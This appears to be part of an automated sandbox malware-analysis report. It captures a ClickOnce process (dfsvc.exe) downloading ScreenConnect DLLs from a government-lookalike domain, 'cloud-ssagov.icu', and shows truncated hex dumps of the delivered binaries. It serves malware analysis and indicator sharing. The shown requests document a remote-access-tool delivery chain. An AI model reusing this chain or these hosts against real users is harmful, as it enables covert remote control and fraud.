                                                                                                                        2024-11-13 17:18:20 UTC16384INData Raw: 00 00 11 73 75 00 00 0a 0a 06 72 8f 0f 00 70 6f 76 00 00 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 f6 02 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 0a 16 2a 2e 02 03 28 f8 02 00 06 16 fe 01 2a 26 0f 00 03 28 fb 02 00 06 2a 0a 16 2a 5e 03 75 77 00 00 02 2c 0d 02 03 a5 77 00 00 02 28 fb 02 00 06 2a 16 2a 0a 17 2a 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a 06 72 c3 0f 00 70 6f 76 00 00 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 fd 02 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 0a 16 2a 2e 02 03 28 ff 02 00 06 16 fe 01 2a 26 0f 00 03 28 02 03 00 06 2a 0a 16 2a 5e 03 75 78 00 00 02 2c 0d 02 03 a5 78 00 00 02 28 02 03 00 06 2a 16 2a 0a 17 2a 00
                                                                                                                        Data Ascii: surpov&rYpov&(, ow&}ow&o)**.(*&(**^uw,w(***0@surpov&rYpov&(, ow&}ow&o)**.(*&(**^ux,x(***
                                                                                                                        2024-11-13 17:18:20 UTC16384INData Raw: 15 04 00 06 72 b7 17 00 70 18 28 2e 02 00 0a 26 02 28 da 00 00 0a 7d 05 01 00 04 02 7e 2c 02 00 0a 7d 06 01 00 04 02 15 7d 07 01 00 04 02 28 ef 00 00 0a 6f 2f 02 00 0a 7d 04 01 00 04 02 7b 04 01 00 04 03 06 7b 6b 01 00 04 6f 30 02 00 0a 06 7b 6b 01 00 04 6f 31 02 00 0a 6f 32 02 00 0a 02 7b 04 01 00 04 05 0e 04 6f 33 02 00 0a 02 7b 04 01 00 04 16 16 06 7b 6b 01 00 04 6f 30 02 00 0a 06 7b 6b 01 00 04 6f 31 02 00 0a 73 95 01 00 0a 06 fe 06 b5 04 00 06 73 34 02 00 0a 28 35 02 00 0a de 10 26 02 28 14 04 00 06 fe 1a 07 28 bd 00 00 0a dc 2a 00 00 00 01 1c 00 00 00 00 66 00 76 dc 00 09 16 00 00 01 02 00 1a 00 cb e5 00 07 00 00 00 00 1b 30 03 00 42 00 00 00 25 00 00 11 02 7b 03 01 00 04 0a 06 28 b8 00 00 0a 02 28 15 04 00 06 72 cb 17 00 70 18 28 36 02 00 0a 26 02
                                                                                                                        Data Ascii: rp(.&(}~,}}(o/}{{ko0{ko1o2{o3{{ko0{ko1ss4(5&((*fv0B%{((rp(6&
                                                                                                                        2024-11-13 17:18:20 UTC16384INData Raw: 00 38 56 4a 1f 16 00 6a 38 4e 1f 16 00 76 38 4e 1f 36 00 56 0a 58 1f 16 00 e1 01 5d 1f 16 00 f6 03 6e 1f 16 00 30 07 7f 1f 16 00 ab 08 5d 1f 16 00 30 04 87 1f 16 00 4d 07 91 1f 16 00 01 00 9b 1f 16 00 3b 03 9b 1f 06 00 ce 72 a4 1f 06 00 69 5c b3 1d 06 00 ce 72 a4 1f 06 00 a5 75 a4 1d 01 00 e3 74 a9 1f 01 00 e5 59 bf 10 01 00 50 37 af 1f 36 00 56 0a b4 1f 16 00 8a 02 b9 1f 36 00 56 0a c5 1f 16 00 a0 00 b9 1f 36 00 56 0a fc 11 16 00 70 00 f2 11 16 00 94 03 68 12 06 00 12 81 64 07 06 00 06 63 ca 11 06 00 7b 6d 25 11 06 00 ce 72 cf 11 06 00 71 32 dc 11 06 00 9c 79 e1 11 06 00 90 83 bc 10 06 00 a9 62 42 13 06 00 ce 72 cf 11 06 00 19 0d 58 04 06 00 26 77 ca 1f 06 00 ce 72 cf 1f 06 00 ac 65 90 1e 06 00 7d 5d e1 11 36 00 56 0a d4 1f 16 00 6c 01 d9 1f 06 00 ce 72
                                                                                                                        Data Ascii: 8VJj8Nv8N6VX]n0]0M;ri\rutYP76V6V6Vphdc{m%rq2ybBrX&wre}]6Vlr
                                                                                                                        2024-11-13 17:18:20 UTC16384INData Raw: 00 00 00 c6 05 dc 6e b8 21 e8 03 00 00 00 00 00 00 c6 05 11 0c b1 04 e8 03 74 b2 00 00 00 00 c4 01 1e 2a db 2b e8 03 94 b2 00 00 00 00 94 00 7b 3e e5 2b e9 03 00 00 00 00 00 00 c4 05 42 64 ef 2b ea 03 37 b3 00 00 00 00 81 00 bc 71 ef 2b eb 03 58 b3 00 00 00 00 c4 00 58 10 e7 21 ec 03 a8 b9 00 00 00 00 81 00 81 2a f6 2b ed 03 10 ba 00 00 00 00 91 00 00 0f 05 2c f0 03 a8 ba 00 00 00 00 81 00 6a 09 15 2c f4 03 c8 ba 00 00 00 00 91 18 97 66 c0 20 f5 03 d4 ba 00 00 00 00 86 18 91 66 01 00 f5 03 dc ba 00 00 00 00 83 00 87 01 1c 2c f5 03 fb ba 00 00 00 00 91 18 97 66 c0 20 f6 03 07 bb 00 00 00 00 86 18 91 66 01 00 f6 03 0f bb 00 00 00 00 83 00 3a 00 2d 2c f6 03 17 bb 00 00 00 00 83 00 74 03 34 2c f7 03 1f bb 00 00 00 00 83 00 a3 01 85 29 f8 03 32 bb 00 00 00 00
                                                                                                                        Data Ascii: n!t*+{>+Bd+7q+XX!*+,j,f f,f f:-,t4,)2
                                                                                                                        2024-11-13 17:18:20 UTC16384INData Raw: 00 b6 1c 01 13 1a 00 e8 2e 01 13 6b 00 b6 1c 20 13 6b 00 b6 1c 21 13 6b 00 b6 1c 41 13 6b 00 b6 1c 60 13 6b 00 b6 1c 61 13 1a 00 e8 2e 61 13 6b 00 b6 1c 80 13 6b 00 b6 1c a3 13 6b 00 b6 1c c3 13 6b 00 b6 1c e1 13 6b 00 b6 1c e3 13 6b 00 b6 1c 01 14 6b 00 b6 1c 03 14 6b 00 b6 1c 21 14 6b 00 b6 1c 41 14 6b 00 b6 1c 60 14 6b 00 b6 1c 61 14 6b 00 b6 1c 63 14 6b 00 b6 1c 81 14 6b 00 b6 1c 83 14 6b 00 b6 1c a0 14 6b 00 b6 1c a1 14 6b 00 b6 1c c1 14 6b 00 b6 1c c3 14 6b 00 b6 1c e1 14 6b 00 b6 1c e3 14 6b 00 b6 1c 01 15 6b 00 b6 1c 03 15 6b 00 b6 1c 21 15 6b 00 b6 1c 23 15 6b 00 b6 1c 41 15 1a 00 69 2f 41 15 6b 00 b6 1c 44 15 c2 05 b6 1c 61 15 6b 00 b6 1c 63 15 6b 00 b6 1c 80 15 6b 00 b6 1c 81 15 6b 00 b6 1c 83 15 6b 00 b6 1c a0 15 6b 00 b6 1c a1 15 1a 00 e8 2e
                                                                                                                        Data Ascii: .k k!kAk`ka.akkkkkkkk!kAk`kakckkkkkkkkkkk!k#kAi/AkDakckkkkk.
                                                                                                                        2024-11-13 17:18:20 UTC16384INData Raw: 74 69 6d 65 72 49 44 00 67 65 74 5f 52 65 71 75 65 73 74 49 44 00 73 65 74 5f 52 65 71 75 65 73 74 49 44 00 3c 3e 4f 00 53 79 73 74 65 6d 2e 49 4f 00 3c 73 74 72 65 61 6d 49 44 3e 50 00 43 61 6c 63 75 6c 61 74 65 46 50 53 00 54 00 67 65 74 5f 58 00 74 69 6c 65 58 00 67 65 74 5f 59 00 74 69 6c 65 59 00 76 61 6c 75 65 5f 5f 00 55 6e 69 6f 6e 55 6e 6c 65 73 73 4e 6f 41 72 65 61 00 67 65 74 5f 44 61 74 61 00 73 65 74 5f 44 61 74 61 00 73 6f 75 6e 64 44 61 74 61 00 57 72 69 74 65 4d 65 73 73 61 67 65 44 61 74 61 00 67 65 74 5f 46 72 61 6d 65 44 61 74 61 00 73 65 74 5f 46 72 61 6d 65 44 61 74 61 00 53 69 67 6e 44 61 74 61 00 67 65 74 5f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 44 61 74 61 00 73 65 74 5f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 44 61 74 61 00
                                                                                                                        Data Ascii: timerIDget_RequestIDset_RequestID<>OSystem.IO<streamID>PCalculateFPSTget_XtileXget_YtileYvalue__UnionUnlessNoAreaget_Dataset_DatasoundDataWriteMessageDataget_FrameDataset_FrameDataSignDataget_AuthenticationDataset_AuthenticationData
                                                                                                                        2024-11-13 17:18:20 UTC16384INData Raw: 50 72 6f 70 65 72 74 69 65 73 2e 53 74 61 74 75 73 47 6c 79 70 68 42 6c 61 6e 6b 4d 6f 6e 69 74 6f 72 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 4f 70 65 6e 4d 6f 6e 69 74 6f 72 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6e 74 72 6f 6c 50 61 6e 65 6c 4d 65 73 73 61 67 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 53 65 6e 64 43 6c 69 70 62 6f 61 72 64 4b 65 79 73 74 72 6f 6b 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 53 65 6e 64 46 69 6c 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63
                                                                                                                        Data Ascii: Properties.StatusGlyphBlankMonitor.pngScreenConnect.Properties.CommandOpenMonitor.pngScreenConnect.Properties.ControlPanelMessages.pngScreenConnect.Properties.CommandSendClipboardKeystrokes.pngScreenConnect.Properties.CommandSendFiles.pngScreenConnec
                                                                                                                        2024-11-13 17:18:20 UTC16384INData Raw: 00 74 00 65 00 4d 00 69 00 63 00 72 00 6f 00 70 00 68 00 6f 00 6e 00 65 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 3b 53 00 65 00 6c 00 65 00 63 00 74 00 53 00 6f 00 75 00 6e 00 64 00 43 00 61 00 70 00 74 00 75 00 72 00 65 00 4d 00 6f 00 64 00 65 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 27 53 00 6f 00 75 00 6e 00 64 00 43 00 61 00 70 00 74 00 75 00 72 00 65 00 4d 00 6f 00 64 00 65 00 20 00 3d 00 20 00 00 2b 53 00 65 00 6c 00 65 00 63 00 74 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 27 4d 00 75 00 74 00 65 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 31 53 00 65 00 74 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 56 00 6f 00 6c 00 75 00
                                                                                                                        Data Ascii: teMicrophoneCommand;SelectSoundCaptureModeCommand'SoundCaptureMode = +SelectSpeakersCommand'MuteSpeakersCommand1SetSpeakersVolu
                                                                                                                        2024-11-13 17:18:20 UTC16384INData Raw: 0a 01 00 02 00 00 00 00 01 00 00 6d 01 00 05 00 00 00 10 57 61 69 74 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 15 53 74 61 72 74 4d 69 6c 6c 69 73 65 63 6f 6e 64 43 6f 75 6e 74 13 57 61 73 4e 65 74 77 6f 72 6b 52 65 61 63 68 61 62 6c 65 13 57 61 73 48 61 6e 64 73 68 61 6b 65 53 74 61 72 74 65 64 15 57 61 73 48 61 6e 64 73 68 61 6b 65 43 6f 6d 70 6c 65 74 65 64 00 00 21 01 00 02 00 00 00 10 4d 65 74 72 69 63 73 45 6e 74 72 79 54 79 70 65 07 4d 69 6e 69 6d 75 6d 00 00 26 01 00 84 6b 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 26 01 00 4c 14 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69 70 6c 65 00 54 02 09 49 6e 68 65 72 69 74 65 64 00 26 01 00 02 00 00 00 02 00 54 02 0d 41 6c 6c 6f 77 4d 75 6c 74 69
                                                                                                                        Data Ascii: mWaitMillisecondsStartMillisecondCountWasNetworkReachableWasHandshakeStartedWasHandshakeCompleted!MetricsEntryTypeMinimum&kTAllowMultipleTInherited&LTAllowMultipleTInherited&TAllowMulti


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        11192.168.2.449763185.49.126.734436996C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-11-13 17:18:21 UTC124OUTGET /Bin/ScreenConnect.ClientService.dll HTTP/1.1
                                                                                                                        Host: cloud-ssagov.icu
                                                                                                                        Accept-Encoding: gzip
                                                                                                                        Connection: Keep-Alive
                                                                                                                        2024-11-13 17:18:22 UTC234INHTTP/1.1 200 OK
                                                                                                                        Cache-Control: private
                                                                                                                        Content-Length: 68096
                                                                                                                        Content-Type: text/html
                                                                                                                        Server: Microsoft-HTTPAPI/2.0
                                                                                                                        X-Robots-Tag: noindex
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        Date: Wed, 13 Nov 2024 17:18:21 GMT
                                                                                                                        Connection: close
                                                                                                                        2024-11-13 17:18:22 UTC16150INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6e 75 1d df 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 02 01 00 00 06 00 00 00 00 00 00 ba 20 01 00 00 20 00 00 00 40 01 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 01 00 00 02 00 00 70 0e 01 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELnu" 0 @ p@
                                                                                                                        2024-11-13 17:18:22 UTC16384INData Raw: bb 00 00 0a 25 09 6f 23 02 00 0a 6f bc 00 00 0a 6f 94 00 00 0a 07 6f 11 00 00 0a 2d d0 de 0a 07 2c 06 07 6f 10 00 00 0a dc 06 7b 54 00 00 04 6f 24 02 00 0a 13 04 2b 5a 11 04 6f 25 02 00 0a 13 05 02 7b 53 00 00 04 7b 0d 00 00 04 11 05 73 26 02 00 0a 25 02 7b 52 00 00 04 28 f8 00 00 0a 7e 30 00 00 04 25 2d 17 26 7e 2b 00 00 04 fe 06 6d 00 00 06 73 06 02 00 0a 25 80 30 00 00 04 28 5f 00 00 2b 6f 27 02 00 0a 73 81 00 00 0a 6f 82 00 00 0a 11 04 6f 11 00 00 0a 2d 9d de 0c 11 04 2c 07 11 04 6f 10 00 00 0a dc 2a 01 1c 00 00 02 00 65 00 34 99 00 0a 00 00 00 00 02 00 b0 00 67 17 01 0c 00 00 00 00 1e 02 28 1d 00 00 0a 2a 56 02 7b 54 00 00 04 03 6f 23 02 00 0a 6f 28 02 00 0a 16 fe 01 2a 1e 02 28 1d 00 00 0a 2a 4a 02 7b 56 00 00 04 6f 29 02 00 0a 03 28 2a 02 00 0a 2a
                                                                                                                        Data Ascii: %o#ooo-,o{To$+Zo%{S{s&%{R(~0%-&~+ms%0(_+o'soo-,o*e4g(*V{To#o(*(*J{Vo)(**
                                                                                                                        2024-11-13 17:18:22 UTC16384INData Raw: 74 00 d1 07 2e 3e 16 15 31 04 c0 25 1c 15 79 05 16 3e 27 15 19 04 ae 2d 2d 15 19 04 cd 2e 37 15 b1 04 3c 27 3e 15 31 04 cb 31 78 09 29 04 e0 42 f6 00 e9 04 fe 42 56 15 f4 00 9b 18 81 02 31 04 a5 32 5c 15 f4 03 71 3a a1 00 fc 03 71 3a a1 00 19 04 ca 2d 85 15 11 03 71 3a 6a 04 09 03 5e 30 9e 15 d9 07 e5 35 a7 15 09 03 42 2c ad 15 e1 07 6b 29 06 00 19 03 5d 31 20 02 31 04 83 2d bd 15 29 04 84 31 6a 04 19 03 80 25 20 02 29 04 ad 25 6a 04 19 03 99 1b 20 02 29 04 c6 1b 6a 04 e1 07 61 29 06 00 21 03 f7 2e 20 02 d1 00 ea 49 c5 15 29 04 04 2f 6a 04 a9 04 31 3d b2 11 8c 03 8d 08 5a 04 e9 04 b2 49 bd 0a 04 04 f8 3e 46 00 8c 03 52 0b 5e 04 e9 04 cd 42 d8 15 31 04 e2 34 e0 15 29 04 e0 46 14 01 d1 01 9a 42 ef 15 5c 02 de 2c 63 00 09 02 e1 2e 14 01 69 02 c8 41 00 16 69
                                                                                                                        Data Ascii: t.>1%y>'--.7<'>11x)BBV12\q:q:-q:j^05B,k)]1 1-)1j% )%j )ja)!. I)/j1=ZI>FR^B14)FB\,c.iAi
                                                                                                                        2024-11-13 17:18:22 UTC16384INData Raw: 6e 74 69 61 6c 73 41 63 74 69 6f 6e 00 53 65 63 75 72 69 74 79 41 63 74 69 6f 6e 00 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 00 53 65 74 74 69 6e 67 73 50 72 6f 70 65 72 74 79 56 61 6c 75 65 43 6f 6c 6c 65 63 74 69 6f 6e 00 47 72 6f 75 70 43 6f 6c 6c 65 63 74 69 6f 6e 00 57 61 69 74 69 6e 67 46 6f 72 43 6f 6e 6e 65 63 74 69 6f 6e 00 57 69 6e 33 32 45 78 63 65 70 74 69 6f 6e 00 43 72 79 70 74 6f 67 72 61 70 68 69 63 45 78 63 65 70 74 69 6f 6e 00 4e 6f 74 53 75 70 70 6f 72 74 65 64 45 78 63 65 70 74 69 6f 6e 00 54 72 61 63 65 45 78 63 65 70 74 69 6f 6e 00 45 6e 64 4f 66 53 74 72 65 61 6d 45 78 63 65 70 74 69 6f 6e 00 52 75 6e 57 69 74 68 43 72 61 73 68 4f 6e 45 78 63 65 70 74 69 6f 6e 00 54 72 79 53 75 62 73 63 72 69 62 65 54 6f 4c 6f 67 41 70 70
                                                                                                                        Data Ascii: ntialsActionSecurityActionSystem.ReflectionSettingsPropertyValueCollectionGroupCollectionWaitingForConnectionWin32ExceptionCryptographicExceptionNotSupportedExceptionTraceExceptionEndOfStreamExceptionRunWithCrashOnExceptionTrySubscribeToLogApp
                                                                                                                        2024-11-13 17:18:22 UTC2794INData Raw: 6e 43 6f 6e 6e 65 63 74 20 53 6f 66 74 77 61 72 65 00 00 08 01 00 00 08 00 00 00 00 05 01 00 01 00 00 05 01 00 02 00 00 0a 01 00 02 00 00 00 00 01 00 00 20 01 00 03 00 00 00 09 53 65 73 73 69 6f 6e 49 44 04 4e 61 6d 65 08 55 73 65 72 4e 61 6d 65 00 00 0d 01 00 05 00 00 00 00 00 00 00 01 00 00 2d 01 00 02 00 00 00 1c 43 72 65 64 65 6e 74 69 61 6c 50 72 6f 76 69 64 65 72 49 6e 73 74 61 6e 63 65 49 44 07 4d 65 73 73 61 67 65 00 00 0b 01 00 03 00 00 00 00 01 01 00 00 33 01 00 03 00 00 00 0e 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 0b 43 6f 6d 6d 61 6e 64 4c 69 6e 65 0f 50 61 72 65 6e 74 50 72 6f 63 65 73 73 49 44 00 00 52 01 00 05 00 00 00 0e 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 0b 43 6f 6d 6d 61 6e 64 4c 69 6e 65 0f 50 61 72 65 6e 74 50 72 6f 63 65 73
                                                                                                                        Data Ascii: nConnect Software SessionIDNameUserName-CredentialProviderInstanceIDMessage3ExecutablePathCommandLineParentProcessIDRExecutablePathCommandLineParentProces


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        12192.168.2.449764185.49.126.734436996C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2024-11-13 17:18:23 UTC115OUTGET /Bin/ScreenConnect.Core.dll HTTP/1.1
                                                                                                                        Host: cloud-ssagov.icu
                                                                                                                        Accept-Encoding: gzip
                                                                                                                        Connection: Keep-Alive
                                                                                                                        2024-11-13 17:18:23 UTC235INHTTP/1.1 200 OK
                                                                                                                        Cache-Control: private
                                                                                                                        Content-Length: 548864
                                                                                                                        Content-Type: text/html
                                                                                                                        Server: Microsoft-HTTPAPI/2.0
                                                                                                                        X-Robots-Tag: noindex
                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                        Date: Wed, 13 Nov 2024 17:18:23 GMT
                                                                                                                        Connection: close
                                                                                                                        2024-11-13 17:18:23 UTC16149INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c b7 8b a9 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 58 08 00 00 06 00 00 00 00 00 00 b6 73 08 00 00 20 00 00 00 80 08 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 02 00 00 5d f6 08 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELl" 0Xs ]@
                                                                                                                        2024-11-13 17:18:23 UTC16384INData Raw: 73 78 09 00 06 14 28 35 04 00 06 26 2a 1e 02 7b 6e 01 00 0a 2a 22 02 03 7d 6e 01 00 0a 2a 3a 02 28 3c 00 00 0a 02 03 28 6f 01 00 0a 2a 00 00 13 30 02 00 28 00 00 00 3c 00 00 11 03 6f 48 01 00 0a 0a 02 7b 70 01 00 0a 2d 0f 06 28 2b 00 00 2b 2c 07 02 06 7d 70 01 00 0a 06 02 7b 70 01 00 0a fe 01 2a 3e 03 6f 16 07 00 06 04 6f 16 07 00 06 fe 01 2a 3e 02 03 28 71 01 00 0a 02 15 7d 72 01 00 0a 2a 13 30 03 00 33 01 00 00 3d 00 00 11 03 2d 0a 12 01 fe 15 81 00 00 1b 07 2a 02 03 28 73 01 00 0a 0a 03 6f 16 07 00 06 02 7b 72 01 00 0a fe 01 06 5f 2c 42 02 7b 74 01 00 0a 8c 81 00 00 1b 2c 18 02 28 75 01 00 0a 02 fe 06 76 01 00 0a 73 77 01 00 0a 28 2c 00 00 2b 26 02 15 7d 72 01 00 0a 02 7c 74 01 00 0a fe 15 81 00 00 1b 12 01 fe 15 81 00 00 1b 07 2a 03 6f 16 07 00 06 02
                                                                                                                        Data Ascii: sx(5&*{n*"}n*:(<(o*0(<oH{p-(++,}p{p*>oo*>(q}r*03=-*(so{r_,B{t,(uvsw(,+&}r|t*o
                                                                                                                        2024-11-13 17:18:23 UTC16384INData Raw: 00 07 00 0a 11 00 16 00 00 00 00 3a 02 03 28 7d 00 00 2b 28 7e 00 00 2b 26 2a 00 13 30 03 00 54 00 00 00 42 00 00 11 02 45 04 00 00 00 02 00 00 00 0c 00 00 00 20 00 00 00 16 00 00 00 2b 28 03 04 73 c8 02 00 0a 0a 2b 30 03 04 73 c9 02 00 0a 0a 2b 26 03 04 73 ca 02 00 0a 0a 2b 1c 03 04 73 96 01 00 0a 0a 2b 12 72 b9 0c 00 70 02 8c b6 00 00 02 14 73 cb 02 00 0a 7a 06 2a 5a d0 8f 00 00 1b 28 3e 01 00 0a 02 28 cc 02 00 0a a5 8f 00 00 1b 2a 9e 03 02 7e d3 05 00 04 25 2d 17 26 7e d2 05 00 04 fe 06 a8 0e 00 06 73 cd 02 00 0a 25 80 d3 05 00 04 28 7f 00 00 2b 2a 00 1b 30 01 00 25 00 00 00 1e 00 00 11 02 28 ce 02 00 0a 2d 0a 12 00 fe 15 8f 00 00 1b 06 2a 00 03 6f 0a 02 00 0a 0a de 07 02 28 2f 01 00 0a dc 06 2a 00 00 00 01 10 00 00 02 00 13 00 09 1c 00 07 00 00 00 00
                                                                                                                        Data Ascii: :(}+(~+&*0TBE +(s+0s+&s+s+rpsz*Z(>(*~%-&~s%(+*0%(-*o(/*
                                                                                                                        2024-11-13 17:18:23 UTC16384INData Raw: 00 00 00 13 30 04 00 32 00 00 00 d4 00 00 11 02 03 6f 3c 04 00 0a 0a 06 15 33 0a 12 01 fe 15 b3 01 00 1b 07 2a 02 16 06 6f 88 03 00 0a 02 06 17 58 6f f4 02 00 0a 28 59 00 00 2b 73 3b 04 00 0a 2a fe 02 25 2d 06 26 7e 9a 01 00 0a 03 6f 8e 01 00 0a 7e e5 05 00 04 25 2d 17 26 7e d2 05 00 04 fe 06 ba 0e 00 06 73 a1 02 00 0a 25 80 e5 05 00 04 28 b3 00 00 2b 28 6e 04 00 06 28 72 00 00 2b 2a 6e 03 0f 00 28 16 04 00 0a 81 8f 00 00 1b 04 0f 00 28 17 04 00 0a 81 90 00 00 1b 2a 3e 1f fe 73 9b 0f 00 06 25 02 7d a2 06 00 04 2a ae 02 16 16 16 16 73 27 03 00 06 7e d1 05 00 04 25 2d 13 26 14 fe 06 44 03 00 06 73 3d 04 00 0a 25 80 d1 05 00 04 28 d4 00 00 2b 2a 82 02 28 d5 00 00 2b 03 28 d5 00 00 2b 04 2d 04 16 6a 2b 02 15 6a 28 4c 05 00 06 28 d6 00 00 2b 2a 26 02 03 66 5f
                                                                                                                        Data Ascii: 02o<3*oXo(Y+s;*%-&~o~%-&~s%(+(n(r+*n((*>s%}*s'~%-&Ds=%(+*(+(+-j+j(L(+*&f_
                                                                                                                        2024-11-13 17:18:23 UTC16384INData Raw: 00 04 2a 22 02 03 7d 93 02 00 04 2a 1e 02 7b 94 02 00 04 2a 22 02 03 7d 94 02 00 04 2a 1e 02 7b 95 02 00 04 2a 22 02 03 7d 95 02 00 04 2a 00 13 30 04 00 fd 00 00 00 1f 01 00 11 1f 12 8d b8 00 00 01 25 16 72 e8 13 00 70 a2 25 17 02 28 55 07 00 06 28 57 0b 00 06 a2 25 18 72 fe 13 00 70 a2 25 19 02 28 57 07 00 06 0a 12 00 28 98 01 00 0a a2 25 1a 72 10 14 00 70 a2 25 1b 02 28 59 07 00 06 0a 12 00 28 98 01 00 0a a2 25 1c 72 22 14 00 70 a2 25 1d 02 28 5b 07 00 06 0a 12 00 28 98 01 00 0a a2 25 1e 72 34 14 00 70 a2 25 1f 09 02 28 5d 07 00 06 0a 12 00 28 98 01 00 0a a2 25 1f 0a 72 32 13 00 70 a2 25 1f 0b 02 28 5f 07 00 06 28 57 0b 00 06 a2 25 1f 0c 72 48 14 00 70 a2 25 1f 0d 02 28 61 07 00 06 0b 12 01 fe 16 2d 01 00 02 6f 43 00 00 0a a2 25 1f 0e 72 68 14 00 70 a2
                                                                                                                        Data Ascii: *"}*{*"}*{*"}*0%rp%(U(W%rp%(W(%rp%(Y(%r"p%([(%r4p%(](%r2p%(_(W%rHp%(a-oC%rhp
                                                                                                                        2024-11-13 17:18:23 UTC16384INData Raw: 04 04 9a 2c 0d 02 7b d7 03 00 04 04 9a 8e 69 06 2f 0e 02 7b d7 03 00 04 04 06 8d b9 00 00 01 a2 02 7b d7 03 00 04 04 9a 2a 9a 02 02 7b d8 03 00 04 02 28 f5 01 00 06 6a 58 7d d8 03 00 04 02 02 7b d9 03 00 04 7e 2c 06 00 0a 28 80 01 00 2b 2a 00 00 00 13 30 03 00 29 00 00 00 51 01 00 11 02 7b d9 03 00 04 0a 06 0b 07 03 28 2d 06 00 0a 74 4f 00 00 1b 0c 02 7c d9 03 00 04 08 07 28 81 01 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 51 01 00 11 02 7b d9 03 00 04 0a 06 0b 07 03 28 2f 06 00 0a 74 4f 00 00 1b 0c 02 7c d9 03 00 04 08 07 28 81 01 00 2b 0a 06 07 33 df 2a 56 02 28 37 0a 00 06 02 03 7d da 03 00 04 02 04 7d db 03 00 04 2a 1e 02 7b da 03 00 04 2a 1e 02 7b db 03 00 04 2a 5a 03 02 28 3f 0a 00 06 5a 1e 28 19 04 00 06 02 28 40 0a 00 06 58 2a 86 02
                                                                                                                        Data Ascii: ,{i/{{*{(jX}{~,(+*0)Q{(-tO|(+3*0)Q{(/tO|(+3*V(7}}*{*{*Z(?Z((@X*
